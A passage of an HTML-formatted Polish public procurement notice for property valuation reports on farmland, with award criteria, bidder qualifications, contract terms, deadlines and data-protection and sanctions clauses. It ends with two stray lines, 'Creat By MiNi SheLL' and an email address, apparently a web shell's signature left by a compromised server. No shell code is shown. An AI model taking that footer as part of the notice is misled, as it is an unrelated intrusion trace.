</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 4<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości: <br/>1.	Działka nr 117/2 o powierzchni 12,4042 ha, obręb Obudno, gmina Gąsawa, powiat żniński. Dla przedmiotowej nieruchomości prowadzona jest księga wieczysta nr BY1Z/00012156/3. Charakterystyka nieruchomości – nieruchomość rolna niezabudowana, użytkowana rolniczo, posiada dostęp do drogi. Dla nieruchomości nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy. Nie została wydana decyzja o warunkach zabudowy oraz lokalizacji inwestycji celu publicznego. W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy przedmiotowa działka znajduje się na terenie oznaczonym jako R - tereny rolne.<br/>Wykonanie – 1 operatu szacunkowego w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 5<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości:<br/>1.	Działka nr 2/14, 2/17 o łącznej powierzchni 29,4860 ha, obręb Dubielno, <br/>gmina Papowo Biskupie, powiat chełmiński. <br/>Charakterystyka nieruchomości – nieruchomość rolna, zabudowana, posiada dostęp do drogi publicznej. Dla ww. nieruchomości prowadzona jest KW nr TO1T/00028046/0. Dla działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy, <br/>a także nie wydano decyzji o warunkach zabudowy. Zgodnie z zapisami studium działka nr 2/14 położona jest na terenie zabudowy usługowej, z kolei działka nr 2/17 znajduje się na terenie zabudowy usługowej (w pasie przyległym do drogi), a pozostała część działki znajduje się wg. studium w rolniczej przestrzeni produkcyjnej. <br/>Uwaga: działka nr 2/17 objęta jest decyzją lokalizacji celu publicznego nr 1 z dnia 1 lutego 2023 r. ustaloną dla inwestycji „Modernizacji sieci wodociągowej w m. Dubielno”, polegająca na przebudowie i rozbudowie sieci wodociągowej wraz z przyłączami. <br/>W operacie rzeczoznawca zobowiązany będzie dodatkowo określić powierzchnię, oraz ewentualnie wartość tej części nieruchomości objętej powyższą decyzją. <br/>Wykaz budynków, budowli znajdujących się na nieruchomości:<br/>Działka 2/17:<br/>- Magazyn zbożowy Dubielno nr. inw.29/0518 <br/>- Szopa na narzędzia Dubielno nr. inw. 29/0531<br/>- Magazyn nawozów sztucznych Dubielno nr. inw. 29/0542<br/>- Wychowalnia knurów Dubielno nr. inw.	29/1357<br/>- Ujęcie wody - ZR Wrocławki-Dubielno nr. inw.	29/1358	<br/>- Drenowanie -nr. inw. 29/3586	<br/>- Zbiornik p. poż- ZR Wrocławki-Dubielno 29/3030<br/>- Ujęcie wody (studnia głębinowa): brak nr inw.<br/>- Budynek o wym. 3mx3m: brak nr inw.	<br/>Działka 2/14:<br/>- Chlewnia - ZR Wrocławki-Dubielno nr. inw. 29/0532<br/>- Chlewnia Dubielno nr. inw.29/0533<br/>- Stodoła Dubielno nr. inw. 29/0535<br/>- Obora – chlewnia – ZR Wrocławki-Dubielno nr. inw. 29/0539<br/>- Wybiegi przy chlewni - ZR Wrocławki-Dubielno nr. inw.	29/3153	<br/>W danym operacie Wykonawca zobowiązany jest wycenić wartość całej nieruchomości w rozbiciu na wartość gruntu, wartość każdego budynku i budowli oddzielnie.<br/>Wykonanie – 1 operatu szacunkowego w dwóch egzemplarzach w formie papierowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania oraz którzy spełniają poniższe warunki zamówienia: <br/>a)	w zakresie zdolności do występowania w obrocie gospodarczym - Zamawiający nie stawia warunku w tym zakresie;<br/>b)	w zakresie uprawnień do prowadzenia określonej działalności gospodarczej - Zamawiający nie stawia warunku w tym zakresie;<br/>c)	w zakresie sytuacji ekonomicznej lub finansowej - Zamawiający nie stawia warunku w tym zakresie;<br/>d)	w zakresie zdolności technicznej lub zawodowej – dysponują do realizacji zamówienia minimum 1 osobą posiadającą świadectwo nadania uprawnień zawodowych w zakresie szacowania nieruchomości - zgodnie z art. 156 ust. 1 ustawy o gospodarce nieruchomościami rzeczoznawca majątkowy sporządza na piśmie opinię o wartości nieruchomości w formie operatu szacunkowego.<br/>2.	OCENA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU<br/>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie, wg formuły spełnia/ nie spełnia, na podstawie:<br/>a)	załączonego do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu, złożonego zgodnie z art. 125 ust. 1 ustawy Pzp - wzór oświadczenia stanowi załącznik nr 3 do SWZ<br/>oraz na podstawie:<br/>b)	podmiotowego środka dowodowego w postaci wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia, wraz z informacjami nt. ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do dysponowania tymi osobami – do złożenia którego zostanie wezwany Wykonawca, którego oferta zostanie oceniona najwyżej, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	PEŁNOMOCNICTWO <br/>1.1.	Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa, obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. <br/>1.2.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych Wykonawców, należy załączyć do oferty. <br/>1.3.	W przypadku spółki cywilnej dokumentami zastępującymi pełnomocnictwo mogą być umowa spółki lub uchwała wspólników, wskazujące jednego ze wspólników jako umocowanego do reprezentacji spółki (wszystkich wspólników).<br/>1.4.	Forma umocowania została szczegółowo określona w Specyfikacji Warunków Zamówienia<br/><br/>2.	OŚWIADCZENIE WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA<br/>2.1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji, Wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <br/>2.2. Wzór oświadczenia stanowi załącznik do SWZ	<br/>2.3. Forma oświadczenia została szczegółowo określona w Specyfikacji Warunków Zamówienia <br/><br/>3.	ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO SWOJE ZASOBY<br/>3.1. W przypadku polegania na zasobach podmiotu udostępniającego swoje zasoby, Wykonawca wraz z ofertą składa zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy potwierdzający, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby, gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.<br/>3.2. Wzór zobowiązania stanowi załącznik nr SWZ<br/>3.3. Forma zobowiązania została szczegółowo określona w Specyfikacji Warunków Zamówienia.<br/><br/>4.	OŚWIADCZENIE NT. DOŚWIADCZENIA RZECZOZNAWCY<br/>4.1. Z uwagi na fakt, iż doświadczenie rzeczoznawcy, którego Wykonawca wskaże do realizacji zadania, jest jednym z kryteriów oceny ofert, Zamawiający wymaga wskazania w ofercie imienia i nazwiska rzeczoznawcy, skierowanego do wykonania zamówienia<br/>4.2. Celem uzyskania punktów w kryterium JAKOŚĆ-DOŚWIADCZENIE RZECZOZNAWCY – Wykonawca wraz z ofertą składa oświadczenie nt. wykonanych, w okresie ostatnich 3 lat przed terminem składania ofert, przez Rzeczoznawcę, skierowanego do realizacji zamówienia, operatów szacunkowych, przygotowane zgodnie z wzorem stanowiącym załącznik do SWZ, <br/>4.3.	Forma oświadczenia została szczegółowo określona w Specyfikacji Warunków Zamówienia. <br/>4.4.	Zamawiający zastrzega, że przedmiotowe oświadczenie NIE PODLEGA UZUPEŁNIENIU <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (m.in. konsorcjum, spółka cywilna). W takim przypadku:<br/>a)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>b)	Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z Wykonawców składa wraz z ofertą oświadczenie, o których mowa w art. 125 ust 1 ustawy Pzp. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału <br/>w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi do realizacji których te zdolności są wymagane.<br/>4. W przypadku, o którym mowa w pkt 3, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy – wzór oświadczenia stanowi załącznik do SWZ.<br/>5. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość zmian w umowie w zakresie przedłużenia terminu wykonania zamówienia, tylko i wyłącznie w przypadku:<br/>•	wystąpienia siły wyższej, przez którą należy rozumieć wystąpienie zdarzeń i okoliczności, na które Strony umowy nie mają wpływu, przed którymi, działając z należytą starannością, Strony umowy nie mogły się zabezpieczyć i które wystąpiły po zawarciu umowy (np. pożar, powódź, zalanie, klęska żywiołowa, epidemia). <br/>2.	Zmiany treści umowy mogą nastąpić wyłącznie na pisemny, udokumentowany wniosek WYKONAWCY, który uzyska pozytywną opinię ZAMAWIAJĄCEGO, potwierdzającą jego zasadność. Wniosek powinien być złożony niezwłocznie po zaistnieniu okoliczności, uniemożliwiających terminową realizację prac. Zamawiający zastrzega jednak, że maksymalny okres przesunięcia terminu zakończenia usługi będzie równy okresowi przerwy, na który Wykonawca nie miał wpływu. <br/>3.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności<br/>4.	W przypadku wystąpienia okoliczności nieprzewidzianych, opisanych w art. 455 ustawy Prawo zamówień publicznych zmiany niniejszej umowy mogą nastąpić tylko na zasadach określonych w przywołanym artykule. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-03 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy złożyć za pośrednictwem Platformy zakupowej eB2b pod adresem: https://kowr.eb2b.com.pl/open-preview-auction.html/435968 przy użyciu zakładki „Załączniki”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-03 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-02</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Ciąg dalszy informacji RODO (…) <br/>6. Informacja o wymogu/dobrowolności podania danych osobowych - Podanie Pani/Pana danych osobowych w związku z udziałem w postępowaniu o udzielenie zamówienia ma charakter dobrowolny, ale jest niezbędne do wzięcia w nim udziału.<br/>7.	Prawa osób, których dane dotyczą<br/>Zgodnie z RODO przysługuje Pani/Panu:<br/>1)	prawo dostępu do swoich danych oraz otrzymania ich kopii; <br/>2)	prawo do sprostowania (poprawiania) swoich danych; <br/>3)	prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej; <br/>4)	prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa.<br/>Jeżeli chce Pani/Pan skorzystać z któregokolwiek z tych uprawnień, prosimy o kontakt z Inspektorem Ochrony Danych Osobowych, wskazany w pkt 2 lub pisemnie na adres korespondencyjny, wskazany w pkt 1.<br/>Zgodnie z RODO, każdej osobie, której dane są przetwarzane przysługuje prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. <br/>8.	Zautomatyzowane podejmowanie decyzji<br/>W oparciu o Pani/Pana dane osobowe administrator nie będzie podejmował wobec Pani/Pana zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania. <br/>9.	Przekazywanie danych poza Europejski Obszar Gospodarczy<br/>W związku z jawnością postępowania o udzielenie zamówienia publicznego Pani/Pana dane mogą być przekazywane do państw trzecich (tj. państwa, które nie należy do Europejskiego Obszaru Gospodarczego obejmującego Unię Europejską, Norwegię, Liechtenstein i Islandię), z zastrzeżeniem, o którym mowa w punkcie 4<br/>II. Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy Pzp wyklucza się również:<br/>a)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>b)	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124, 1285, 1723 i 1843) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>c)	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120, 295 i 1598) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3

Creat By MiNi SheLL
Email: jattceo@gmail.com